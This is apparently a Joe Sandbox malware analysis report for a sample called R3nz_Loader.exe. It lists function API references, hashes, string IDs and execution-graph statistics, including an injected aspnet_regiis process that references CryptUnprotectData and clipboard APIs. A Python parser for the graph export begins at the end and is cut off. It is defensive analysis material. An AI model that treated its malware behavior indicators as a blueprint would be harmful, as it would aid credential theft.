                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3664257935-2084034818
                                                                              • Opcode ID: 8f164a22c929e9d75f7a5503a97ba4ea6461e65f64c7f92e720d9d170e19940a
                                                                              • Instruction ID: 2b89920c3148692ccf37dc25dd426d9ee15d2daa71d6e951c721938e82c514c5
                                                                              • Opcode Fuzzy Hash: 8f164a22c929e9d75f7a5503a97ba4ea6461e65f64c7f92e720d9d170e19940a
                                                                              • Instruction Fuzzy Hash: 4311A771F416B5ABDF128A689C48B493374AF52778F350210E974E7784D7A0E90286E5
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CEF2A9C,?,?,6CEF2A64,?,00000001,?), ref: 6CEF2AFF
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CEF2B12
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CEF2A9C,?,?,6CEF2A64,?,00000001,?), ref: 6CEF2B35
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: ecb8bbe5a97e88623912bc87b8cfbcdfab3b0efce124e5c5813db4da93555729
                                                                              • Instruction ID: 7b8a18e6457946cf567e6794a6987d3fb25ec929da78d80a6edb4d722e2b639f
                                                                              • Opcode Fuzzy Hash: ecb8bbe5a97e88623912bc87b8cfbcdfab3b0efce124e5c5813db4da93555729
                                                                              • Instruction Fuzzy Hash: D3F01C31A02219FBDF02AB50DD1DB9E7E79EB45759F204060E931A2690DB348E01DB94
                                                                              APIs
                                                                              • __alloca_probe_16.LIBCMT ref: 6CEF718B
                                                                              • __alloca_probe_16.LIBCMT ref: 6CEF7251
                                                                              • __freea.LIBCMT ref: 6CEF72BD
                                                                                • Part of subcall function 6CEF62BC: HeapAlloc.KERNEL32(00000000,6CEF5FF3,6CEF5FF3,?,6CEF4CF3,00000220,?,6CEF5FF3,?,?,?,?,6CEF8111,00000001,?,?), ref: 6CEF62EE
                                                                              • __freea.LIBCMT ref: 6CEF72C6
                                                                              • __freea.LIBCMT ref: 6CEF72E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                              • String ID:
                                                                              • API String ID: 1096550386-0
                                                                              • Opcode ID: 51245f174aad9a0f91ee2a8126bb7c3d75188237c0a118552e3033cc964f9ff9
                                                                              • Instruction ID: 724d3ee232c44b204ec86f15bfcffad6545525c175e7c2dafe80cbe0bc978d44
                                                                              • Opcode Fuzzy Hash: 51245f174aad9a0f91ee2a8126bb7c3d75188237c0a118552e3033cc964f9ff9
                                                                              • Instruction Fuzzy Hash: A151A3B2601216ABFB118E68CC40EAB3AB9DF55768F35455DFC34A7B40EB30DC5786A0
                                                                              APIs
                                                                              • _free.LIBCMT ref: 6CEF866D
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF867F
                                                                              • _free.LIBCMT ref: 6CEF8691
                                                                              • _free.LIBCMT ref: 6CEF86A3
                                                                              • _free.LIBCMT ref: 6CEF86B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 7cf16526a78460caf841e5d595a191cabcb60c69357045231519d60ce008e896
                                                                              • Instruction ID: c6bb65caf34f505ff8dc2bc760c78b70164c6210b2aa5ea9fa1bca94ecb50fe2
                                                                              • Opcode Fuzzy Hash: 7cf16526a78460caf841e5d595a191cabcb60c69357045231519d60ce008e896
                                                                              • Instruction Fuzzy Hash: 04F04432515604579760DA65D485C9E33F9AB0572C7718C0BE079D7F41D730F9824AD4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID: *?
                                                                              • API String ID: 269201875-2564092906
                                                                              • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                              • Instruction ID: a7395f7160013465e54bf1b74377b4a46f072d6a8ae42bbf7baa8eff8efeed9a
                                                                              • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                              • Instruction Fuzzy Hash: E0616F76E042199FDB14CFA9C9805DDFBF5FF48318B24826AD825E7700E771AE468B90
                                                                              APIs
                                                                                • Part of subcall function 6CEF780F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CEF7857
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CEF5FF3,?,00000000,00000000,6CF00360,0000002C,6CEF6064,?), ref: 6CEF81C2
                                                                              • GetLastError.KERNEL32 ref: 6CEF81CC
                                                                              • __dosmaperr.LIBCMT ref: 6CEF820B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                              • String ID: d`l
                                                                              • API String ID: 910155933-4007956071
                                                                              • Opcode ID: d7ab93ad23c7af4732795ba2c640a6203e043b2e3aa0b8840fe6e625d403963c
                                                                              • Instruction ID: 216b159ed947cd2f4adff9b393be2ec03144efba529569e1930b0096148c1c09
                                                                              • Opcode Fuzzy Hash: d7ab93ad23c7af4732795ba2c640a6203e043b2e3aa0b8840fe6e625d403963c
                                                                              • Instruction Fuzzy Hash: 0451D372A40209AAEB218FA6C804BDEBB75AF4731CF34015AE530A7B51D3719A47C761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                               • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4\D$H\D$T\D$`\D$t\D
                                                                              • API String ID: 0-3727539395
                                                                              • Opcode ID: 0368e68f87729029b281933ce024ae631164ee09756e1e67fa335775d7cc7b02
                                                                              • Instruction ID: 66e00f45a7966d97c22c355d91eb2f0f32d431e074c95d60140f1740f8c4b94a
                                                                              • Opcode Fuzzy Hash: 0368e68f87729029b281933ce024ae631164ee09756e1e67fa335775d7cc7b02
                                                                              • Instruction Fuzzy Hash: 9F11FEB9801B688FEF10CF95C8C858DBBB4FB85718F968156C8543B316C7B46909CF98
                                                                              APIs
                                                                                • Part of subcall function 6CEF4669: _free.LIBCMT ref: 6CEF4677
                                                                                • Part of subcall function 6CEF523D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CEF72B3,?,00000000,00000000), ref: 6CEF52E9
                                                                              • GetLastError.KERNEL32 ref: 6CEF40AF
                                                                              • __dosmaperr.LIBCMT ref: 6CEF40B6
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CEF40F5
                                                                              • __dosmaperr.LIBCMT ref: 6CEF40FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                              • String ID:
                                                                              • API String ID: 167067550-0
                                                                              • Opcode ID: 91b66160be5576b0721773801d182f3b04b8a9b66a6b23dafb332828821281c4
                                                                              • Instruction ID: bcfddebafc6a9edf488019e9719f77d160f8866677e4f5a2bd4a98f05d65affa
                                                                              • Opcode Fuzzy Hash: 91b66160be5576b0721773801d182f3b04b8a9b66a6b23dafb332828821281c4
                                                                              • Instruction Fuzzy Hash: 7C21D372604205AFAB109F668E80C5BB7BDEF4136C724861AF93497B40E731ED429BA1
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,6CEF7C57,?,00000001,6CEF6064,?,6CEF8111,00000001,?,?,?,6CEF5FF3,?,00000000), ref: 6CEF394C
                                                                              • _free.LIBCMT ref: 6CEF39A9
                                                                              • _free.LIBCMT ref: 6CEF39DF
                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CEF8111,00000001,?,?,?,6CEF5FF3,?,00000000,00000000,6CF00360,0000002C,6CEF6064), ref: 6CEF39EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_free
                                                                              • String ID:
                                                                              • API String ID: 2283115069-0
                                                                              • Opcode ID: 9eceb27972c431bb5284f3744faa2d93dea7498f4d4156adac00c0ac4d56e3c7
                                                                              • Instruction ID: 86e61305d5e7fb008904e09e28f896339840d2421fcb1e55c4668b09a9e952ba
                                                                              • Opcode Fuzzy Hash: 9eceb27972c431bb5284f3744faa2d93dea7498f4d4156adac00c0ac4d56e3c7
                                                                              • Instruction Fuzzy Hash: 0411E932709504ABEB416E798C81E5F36799BD367CB35462DF23493BC5EF21880B4113
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3AA3
                                                                              • _free.LIBCMT ref: 6CEF3B00
                                                                              • _free.LIBCMT ref: 6CEF3B36
                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3B41
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_free
                                                                              • String ID:
                                                                              • API String ID: 2283115069-0
                                                                              • Opcode ID: 4718dc2b7a55f8f20a69895a679297e92a3596fe6d63059eac18584bfef1e540
                                                                              • Instruction ID: 3b596c3ad8dbaa916d48f251d28c83ae54e1837565c861f77a716f5359396f7d
                                                                              • Opcode Fuzzy Hash: 4718dc2b7a55f8f20a69895a679297e92a3596fe6d63059eac18584bfef1e540
                                                                              • Instruction Fuzzy Hash: 0811E9327099006BA7416D758C80E5F3A799BD36BCB35462CF53483BC1EB21CD0B4112
                                                                              APIs
                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001), ref: 6CEF8EBD
                                                                              • GetLastError.KERNEL32(?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?,00000001,?,6CEF8132,6CEF5FF3), ref: 6CEF8EC9
                                                                                • Part of subcall function 6CEF8E8F: CloseHandle.KERNEL32(FFFFFFFE,6CEF8ED9,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?,00000001), ref: 6CEF8E9F
                                                                              • ___initconout.LIBCMT ref: 6CEF8ED9
                                                                                • Part of subcall function 6CEF8E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CEF8E80,6CEF88ED,00000001,?,6CEF7BE6,?,?,00000001,?), ref: 6CEF8E64
                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?), ref: 6CEF8EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                              • String ID:
                                                                              • API String ID: 2744216297-0
                                                                              • Opcode ID: 45923eaa62dfb86530495e65611cefd0bd8d7a870477da27f4f9b5c73a7b5e07
                                                                              • Instruction ID: 9e8bc97175ee8704e1be1d9039313bff7b7b1f752454875d3de2df26fd1e01ca
                                                                              • Opcode Fuzzy Hash: 45923eaa62dfb86530495e65611cefd0bd8d7a870477da27f4f9b5c73a7b5e07
                                                                              • Instruction Fuzzy Hash: E7F01C36A10118FBCF222F96DC04A8E3F76EB4A3A9B144011FA3899620C7328D20DB94
                                                                              APIs
                                                                              • _free.LIBCMT ref: 6CEF327D
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF3290
                                                                              • _free.LIBCMT ref: 6CEF32A1
                                                                              • _free.LIBCMT ref: 6CEF32B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 9b13a037dd0d3a7337324d4ccd474edf809051383d032c3f820b288dcd76abae
                                                                              • Instruction ID: cdb2a57864bb17a785a2b0a7a8315fffcf20889148caaf02eee0751955cb5d21
                                                                              • Opcode Fuzzy Hash: 9b13a037dd0d3a7337324d4ccd474edf809051383d032c3f820b288dcd76abae
                                                                              • Instruction Fuzzy Hash: BFE04F76E301209B9FA1BF18E4016C53E31E73AA4C310E04BE41403B12D73502AFDF8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: C:\Users\user\Desktop\R3nz_Loader.exe
                                                                              • API String ID: 0-394733233
                                                                              • Opcode ID: 97671da4c4471acc57f28490bf179452a60e87d5c7f515e6ac50f74f1cdd9912
                                                                              • Instruction ID: afa3f6679cf6fcec6b02874cab5fa7db45868bfcc729759757c54513ad73933b
                                                                              • Opcode Fuzzy Hash: 97671da4c4471acc57f28490bf179452a60e87d5c7f515e6ac50f74f1cdd9912
                                                                              • Instruction Fuzzy Hash: A341A271E04254AFDB11DF99C9949DEBBF8EFA6318F3040AAE424D7740D7708A46CB50
                                                                              APIs
                                                                                • Part of subcall function 6CEF75AF: EnterCriticalSection.KERNEL32(00000001,?,6CEF7FEE,?,6CF00400,00000010,6CEF6107,00000000,00000000,?,?,?,?,6CEF614B,?,00000000), ref: 6CEF75CA
                                                                              • FlushFileBuffers.KERNEL32(00000000,6CF003E0,0000000C,6CEF77F7,d`l,?,00000001,?,6CEF6064,?), ref: 6CEF7739
                                                                              • GetLastError.KERNEL32 ref: 6CEF774A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                              • String ID: d`l
                                                                              • API String ID: 4109680722-4007956071
                                                                              • Opcode ID: dae9eb59fa67060f953722d0b8d3849705bc30a37d9df971d64e7e8b724b16c0
                                                                              • Instruction ID: e9d987d34ce38fe6d6990a94068cdf6dc1ed10f67d07ed21dc7619c1109ad7d2
                                                                              • Opcode Fuzzy Hash: dae9eb59fa67060f953722d0b8d3849705bc30a37d9df971d64e7e8b724b16c0
                                                                              • Instruction Fuzzy Hash: 53018C72A10304DFC7009FA8D844A8EBBB1AF49728F20421EE931DB7D0DBB4D9028B90

                                                                              Execution Graph

                                                                              Execution Coverage:11.3%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:28.2%
                                                                              Total number of Nodes:305
                                                                              Total number of Limit Nodes:29
                                                                              execution_graph: [rendered graph node/edge data omitted]
                                                                              API calls referenced by the graph nodes: CoInitializeEx, CoInitializeSecurity, CoUninitialize, CoCreateInstance, CoSetProxyBlanket, RtlExpandEnvironmentStrings, RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, LdrInitializeThunk, GetLogicalDrives, GetVolumeInformationW, Sleep, OpenClipboard, GetClipboardSequenceNumber, GetClipboardData, CloseClipboard, EmptyClipboard, SetClipboardData, GlobalLock, GlobalUnlock, GlobalAlloc, GlobalFree, GetPhysicallyInstalledSystemMemory, CryptUnprotectData, SysAllocString, SysFreeString, VariantInit, VariantClear, GetComputerNameExA, GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow, FreeLibrary, LoadLibraryExW, GetUserDefaultUILanguage, GetSystemMetrics, CreateThread, ExitProcess

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph: [rendered graph block/edge data omitted] basic blocks 279176a-27919cd; API referenced: VariantInit
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID: #$$$)$-$0$2$2$2$5$5$=$@$B$H$J$L$N$P$R$T$V$Z$\$]$^
                                                                              • API String ID: 1927566239-2983549690
                                                                              • Opcode ID: 66cc99f3ed99a1b172d33687fbf521e39bd855b61df5fc0ac3e3c819c78be7f9
                                                                              • Instruction ID: f819a3d8392791041e1ecc565fad4a3233586b31969af140b346bbaec99aad78
                                                                              • Opcode Fuzzy Hash: 66cc99f3ed99a1b172d33687fbf521e39bd855b61df5fc0ac3e3c819c78be7f9
                                                                              • Instruction Fuzzy Hash: B5519D7160D3C08FE365CB38C59874BBFE1AB96308F48595DE4C98B382C6B98909CB57

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph: [rendered graph block/edge data omitted] basic blocks 277062f-2771cd7; API referenced: RtlExpandEnvironmentStrings (plus internal subroutine calls at 2761880, 2761f40, 2761f50, 2768010, 2768020, 2773f40, 276a9b0, 2774080, 2774220, 2768be0, 2775050, 27697d0, 2768cc0, 2761b90, 2761a90, 2761e40, 2761980, 27740a0)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
• Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,$-$.$0$3$4$;$@$A$A$B$J$K$V$i$n$r
                                                                              • API String ID: 0-884602667
                                                                              • Opcode ID: 6379ba987d0ad300f6619cad2883e4f3e35b1f19b9afdf0cb4b7151555cedab4
                                                                              • Instruction ID: 49234b0eb253f073fc7d1cc8b9b5a2c4d34ef730afbf516f04157adb5921f985
                                                                              • Opcode Fuzzy Hash: 6379ba987d0ad300f6619cad2883e4f3e35b1f19b9afdf0cb4b7151555cedab4
                                                                              • Instruction Fuzzy Hash: 2E62907260D7808BD7259B38C4983AFBBE2ABD5314F098A2ED8DDD7381D6748905CB53
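The `control_flow_graph` lines in this report are Joe Sandbox's text export of the IDA plugin graph: every basic block appears as `<id> <start>-<end>`, optionally followed by `call <target>` entries (with `* N` when the block calls the same target N times) and by the names of Windows APIs invoked from that block, and every edge appears as `<src>-><dst>`. The Python below is an added example, not code from the report or from Joe Sandbox; it parses that export into blocks and edges and answers the questions an analyst usually has about such a function: which blocks touch named APIs (in address order, which is the order the report's APIs list uses), how often each internal routine is called, which blocks have no successor, and whether every block is reachable from the entry. The sample is constructed in the export format: block ids and address ranges come from the 0x2797ba0 function on this page, the edge list is trimmed so the excerpt is self-consistent.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample in the report's control_flow_graph export format. Block ids
# and address ranges are taken from the 0x2797ba0 function in this report; the
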